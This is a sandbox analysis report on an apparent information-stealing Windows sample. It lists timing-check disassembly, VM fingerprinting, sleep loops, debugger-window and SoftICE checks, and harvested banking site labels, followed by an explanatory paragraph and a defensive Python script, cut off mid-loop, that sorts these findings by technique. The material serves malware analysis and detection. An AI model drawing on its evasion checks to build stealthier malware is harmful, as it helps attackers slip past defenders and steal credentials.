0x0000006a jmp 00007EFFACBF2F8Eh 0x0000006f nop 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007EFFACBF2F8Ah 0x00000079 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0680 second address: 52C068F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C068F second address: 52C06BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFFACBF2F8Ch 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C06BB second address: 52C06CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFAC79DCCEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0737 second address: 52C0765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007EFFACBF2F91h 0x00000009 add ax, F1D6h 0x0000000e jmp 00007EFFACBF2F91h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0765 second address: 52C0777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movsx edi, si 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0777 second address: 52B0E23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edx, 074E2610h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f jmp 00007EFFACBF2F8Fh 0x00000014 je 00007F001D390E46h 0x0000001a xor eax, eax 0x0000001c jmp 00007EFFACBCC6BAh 0x00000021 pop esi 0x00000022 pop edi 0x00000023 pop ebx 0x00000024 leave 0x00000025 retn 0004h 0x00000028 nop 0x00000029 cmp eax, 00000000h 0x0000002c setne cl 0x0000002f xor ebx, ebx 0x00000031 test cl, 00000001h 0x00000034 jne 00007EFFACBF2F87h 0x00000036 jmp 00007EFFACBF30FBh 0x0000003b call 00007EFFB0E9D03Fh 0x00000040 mov edi, edi 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 mov si, A925h 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0E23 second address: 52B0E8C instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007EFFAC79DCCAh 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007EFFAC79DCCEh 0x00000018 adc si, 8D68h 0x0000001d jmp 00007EFFAC79DCCBh 0x00000022 popfd 0x00000023 pushad 0x00000024 mov esi, 082B1275h 0x00000029 push esi 0x0000002a pop edx 0x0000002b popad 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f jmp 00007EFFAC79DCCCh 0x00000034 xchg eax, ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007EFFAC79DCD7h 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0E8C second address: 52B0ECB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFACBF2F99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007EFFACBF2F91h 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007EFFACBF2F8Dh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52B0ECB second address: 52B0EF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-04h], 55534552h 0x00000010 pushad 0x00000011 mov esi, 4E6D6D83h 0x00000016 push eax 0x00000017 push edx 0x00000018 mov cl, 25h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0C3B second address: 52C0CA6 instructions: 0x00000000 rdtsc 0x00000002 call 00007EFFACBF2F95h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d mov bl, cl 0x0000000f pushfd 0x00000010 jmp 00007EFFACBF2F99h 0x00000015 or al, FFFFFFE6h 0x00000018 jmp 00007EFFACBF2F91h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 jmp 00007EFFACBF2F8Eh 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov dx, 1DA0h 0x0000002e mov ax, dx 0x00000031 popad 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0CA6 second address: 52C0CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFAC79DCD1h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0CBB second address: 52C0CE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [75AB459Ch], 05h 0x0000000f jmp 00007EFFACBF2F8Dh 0x00000014 je 00007F001D380CAEh 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0CE3 second address: 52C0CE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0CE9 second address: 52C0CF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, al 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0D27 second address: 52C0DBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 mov edi, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 7FE5E10Dh 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007EFFAC79DCD1h 0x00000017 or cx, F776h 0x0000001c jmp 00007EFFAC79DCD1h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007EFFAC79DCD0h 0x00000028 jmp 00007EFFAC79DCD5h 0x0000002d popfd 0x0000002e popad 0x0000002f xor dword ptr [esp], 0A4F7D25h 0x00000036 jmp 00007EFFAC79DCCEh 0x0000003b call 00007F001CF32A9Ah 0x00000040 push 75A52B70h 0x00000045 push dword ptr fs:[00000000h] 0x0000004c mov eax, dword ptr [esp+10h] 0x00000050 mov dword ptr [esp+10h], ebp 0x00000054 lea ebp, dword ptr [esp+10h] 0x00000058 sub esp, eax 0x0000005a push ebx 0x0000005b push esi 0x0000005c push edi 0x0000005d mov eax, dword ptr [75AB4538h] 0x00000062 xor dword ptr [ebp-04h], eax 0x00000065 xor eax, ebp 0x00000067 push eax 0x00000068 mov dword ptr [ebp-18h], esp 0x0000006b push dword ptr [ebp-08h] 0x0000006e mov eax, dword ptr [ebp-04h] 0x00000071 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000078 mov dword ptr [ebp-08h], eax 0x0000007b lea eax, dword ptr [ebp-10h] 0x0000007e mov dword ptr fs:[00000000h], eax 0x00000084 ret 0x00000085 push eax 0x00000086 push edx 0x00000087 jmp 00007EFFAC79DCD7h 0x0000008c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0DBC second address: 52C0DD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFFACBF2F94h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0E59 second address: 52C0E7B instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 je 00007F001CF217EAh 0x0000000e pushad 0x0000000f jmp 00007EFFAC79DCD0h 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0E7B second address: 52C0EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 cmp dword ptr [ebp+08h], 00002000h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007EFFACBF2F99h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0EA3 second address: 52C0EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0EA9 second address: 52C0EAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E074E second address: 52E0818 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov si, E3D3h 0x0000000f pushfd 0x00000010 jmp 00007EFFAC79DCD8h 0x00000015 sbb cx, 5F58h 0x0000001a jmp 00007EFFAC79DCCBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007EFFAC79DCD4h 0x0000002a sub ax, 69B8h 0x0000002f jmp 00007EFFAC79DCCBh 0x00000034 popfd 0x00000035 mov ax, DDEFh 0x00000039 popad 0x0000003a xchg eax, esi 0x0000003b pushad 0x0000003c mov ah, 9Bh 0x0000003e pushfd 0x0000003f jmp 00007EFFAC79DCCDh 0x00000044 add ax, 5456h 0x00000049 jmp 00007EFFAC79DCD1h 0x0000004e popfd 0x0000004f popad 0x00000050 push eax 0x00000051 jmp 00007EFFAC79DCD1h 0x00000056 xchg eax, esi 0x00000057 jmp 00007EFFAC79DCCEh 0x0000005c mov esi, dword ptr [ebp+0Ch] 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 movsx ebx, si 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0818 second address: 52E081D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0953 second address: 52E0974 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFFAC79DCCAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007EFFAC79DCCDh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0974 second address: 52E097A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E09E1 second address: 52E09E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 102EDB5 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 11F7CFF instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 11D25AE instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 125C978 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 8841
              Source: C:\Users\user\Desktop\file.exe TID: 7720 Thread sleep count: 58 > 30
              Source: C:\Users\user\Desktop\file.exe TID: 7720 Thread sleep time: -116058s >= -30000s
              Source: C:\Users\user\Desktop\file.exe TID: 7716 Thread sleep count: 58 > 30
              Source: C:\Users\user\Desktop\file.exe TID: 7716 Thread sleep time: -116058s >= -30000s
              Source: C:\Users\user\Desktop\file.exe TID: 7800 Thread sleep time: -36000s >= -30000s
              Source: C:\Users\user\Desktop\file.exe TID: 7816 Thread sleep time: -210000s >= -30000s
              Source: C:\Users\user\Desktop\file.exe TID: 7700 Thread sleep count: 102 > 30
              Source: C:\Users\user\Desktop\file.exe TID: 7700 Thread sleep time: -204102s >= -30000s
              Source: C:\Users\user\Desktop\file.exe TID: 7704 Thread sleep count: 306 > 30
              Source: C:\Users\user\Desktop\file.exe TID: 7704 Thread sleep time: -612306s >= -30000s
              Source: C:\Users\user\Desktop\file.exe TID: 7696 Thread sleep count: 126 > 30
              Source: C:\Users\user\Desktop\file.exe TID: 7696 Thread sleep time: -252126s >= -30000s
              Source: C:\Users\user\Desktop\file.exe TID: 7692 Thread sleep count: 115 > 30
              Source: C:\Users\user\Desktop\file.exe TID: 7692 Thread sleep time: -230115s >= -30000s
              Source: C:\Users\user\Desktop\file.exe TID: 7704 Thread sleep count: 8841 > 30
              Source: C:\Users\user\Desktop\file.exe TID: 7704 Thread sleep time: -17690841s >= -30000s
              Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exe, 00000000.00000002.2350473775.00000000011AC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: file.exe, file.exe, 00000000.00000003.2349307022.0000000001469000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2340811577.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1950914872.0000000001469000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1950914872.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1862847814.0000000001469000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2351702474.000000000146A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2351859716.0000000001488000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1895389301.0000000001469000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1879407233.0000000001469000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1878781557.0000000001487000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2351614272.000000000140E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: file.exe, 00000000.00000003.1863469629.0000000005CCF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: file.exe, 00000000.00000002.2350473775.00000000011AC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
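The sleep-loop, VM-fingerprint and Anti Debugging rows above are easier to reason about when grouped by technique rather than read row by row. The Python below is an added example written for this page; it is not part of the Joe Sandbox report or its tooling. It parses rows in the "Source: <origin> | <finding>" shape, aggregates the sleep observations per thread, and buckets the remaining evidence. Three points it makes visible: every thread's accumulated sleep time divided by its sleep count comes out to exactly 2001, so each thread is one fixed delay called in a loop (the negative figures are the NT convention in which a negative delay is a relative interval); "Process queried: DebugPort" and "Thread information set: HideFromDebugger" are the sandbox's labels for NtQueryInformationProcess with ProcessDebugPort and NtSetInformationThread with ThreadHideFromDebugger; and most of the "VMware20,1..." hits are site labels (banks, brokers, Office 365) glued to one constant suffix, which looks like saved-login data harvested from the analysis VM's own browser profile rather than a VM check, whereas the VBOX__ ACPI string and the Win32_BIOS query are the real fingerprinting evidence. The window-class names and the NTICE/SICE/SIWVID SoftICE device names are classic protector-stub checks; the "Oreans.vxd ... Software\WinLicense" memory string above points to a WinLicense/Themida-family protector (Oreans is that vendor), so those rows say more about the packer than about LummaC's own code. The sample rows are constructed from the report's values; the regexes and bucket names are this example's own choices.

```python
"""Group sandbox behaviour rows by anti-analysis technique.

Added example for this page; not part of the Joe Sandbox report or its
tooling. Rows are expected in the shape "Source: <origin> | <finding>".
"""
import re
from collections import defaultdict

# Constructed sample rows; the values are copied from the report above.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exe TID: 7700 | Thread sleep count: 102 > 30",
    r"Source: C:\Users\user\Desktop\file.exe TID: 7700 | Thread sleep time: -204102s >= -30000s",
    r"Source: C:\Users\user\Desktop\file.exe TID: 7704 | Thread sleep count: 306 > 30",
    r"Source: C:\Users\user\Desktop\file.exe TID: 7704 | Thread sleep time: -612306s >= -30000s",
    r"Source: C:\Users\user\Desktop\file.exe TID: 7704 | Thread sleep count: 8841 > 30",
    r"Source: C:\Users\user\Desktop\file.exe TID: 7704 | Thread sleep time: -17690841s >= -30000s",
    r"Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS",
    r"Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct",
    r"Source: file.exe, 00000000.00000002.2350473775.00000000011AC000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__",
    r"Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231",
    r"Source: file.exe, 00000000.00000003.1863533373.0000000005CC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696492231s",
    r"Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger",
    r"Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg",
    r"Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class",
    r"Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com",
    r"Source: C:\Users\user\Desktop\file.exe | File opened: NTICE",
    r"Source: C:\Users\user\Desktop\file.exe | File opened: SICE",
    r"Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID",
    r"Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort",
    r"Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort",
    r"Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort",
]

# Window names and SoftICE device names are the ones listed in the report.
DEBUGGER_WINDOWS = {
    "regmonclass", "filemonclass", "procmon_window_class", "ollydbg", "gbdyllo",
    "process monitor - sysinternals: www.sysinternals.com",
    "registry monitor - sysinternals: www.sysinternals.com",
    "file monitor - sysinternals: www.sysinternals.com",
}
SOFTICE_DEVICES = {"NTICE", "SICE", "SIWVID"}
VM_STRINGS = ("VBOX__", "VMware", "Hyper-V")

_TID = re.compile(r"TID: (\d+)")
_SLEEP_COUNT = re.compile(r"Thread sleep count: (\d+) > (\d+)")
_SLEEP_TIME = re.compile(r"Thread sleep time: (-?\d+)s >= (-?\d+)s")
_WINDOW = re.compile(r"Open window title or class name: (.+?)\s*$")
_FILE = re.compile(r"File opened: (\S+)")
_PROC = re.compile(r"Process queried: (\w+)")
_THREAD = re.compile(r"Thread information set: (\w+)")
_WMI = re.compile(r"SELECT \* FROM (\w+)")
_MEMSTR = re.compile(r"Binary or memory string: (.+?)\s*$")
# A site label glued to "VMware20,<digits>": the shape of the harvested
# saved-login rows, which a naive "VMware" substring match would miscount.
_SITE_SUFFIX = re.compile(r"^(.+?)VMware20,\d+")


def triage(lines):
    """Return (sleep_by_tid, evidence_by_technique).

    sleep_by_tid: tid -> {"count", "time", "interval", "flagged"}; "interval"
    is accumulated time divided by sleep count, i.e. the per-call delay.
    """
    sleep = defaultdict(lambda: {"count": 0, "time": 0, "flagged": False})
    tech = defaultdict(list)
    for line in lines:
        tid_m = _TID.search(line)
        tid = tid_m.group(1) if tid_m else "?"
        if m := _SLEEP_COUNT.search(line):
            n, threshold = int(m.group(1)), int(m.group(2))
            sleep[tid]["count"] += n
            if n > threshold:  # the sandbox's own "> 30" rule
                sleep[tid]["flagged"] = True
        elif m := _SLEEP_TIME.search(line):
            # NT delays are negative when relative; keep the magnitude.
            sleep[tid]["time"] += abs(int(m.group(1)))
        elif m := _WINDOW.search(line):
            name = m.group(1).strip().lower()
            if name in DEBUGGER_WINDOWS:
                tech["window probe"].append(name)
        elif m := _FILE.search(line):
            if m.group(1) in SOFTICE_DEVICES:
                tech["softice device"].append(m.group(1))
        elif m := _PROC.search(line):
            if m.group(1) == "DebugPort":  # NtQueryInformationProcess(ProcessDebugPort)
                tech["debug port query"].append(m.group(1))
        elif m := _THREAD.search(line):
            if m.group(1) == "HideFromDebugger":  # NtSetInformationThread(ThreadHideFromDebugger)
                tech["hide from debugger"].append(m.group(1))
        elif m := _WMI.search(line):
            key = "wmi bios" if m.group(1) == "Win32_BIOS" else "wmi av products"
            tech[key].append(m.group(1))
        elif m := _MEMSTR.search(line):
            s = m.group(1).strip()
            site = _SITE_SUFFIX.match(s)
            if site:
                tech["vmware-suffixed site label"].append(site.group(1))
            elif any(v in s for v in VM_STRINGS):
                tech["vm string"].append(s)
    for rec in sleep.values():
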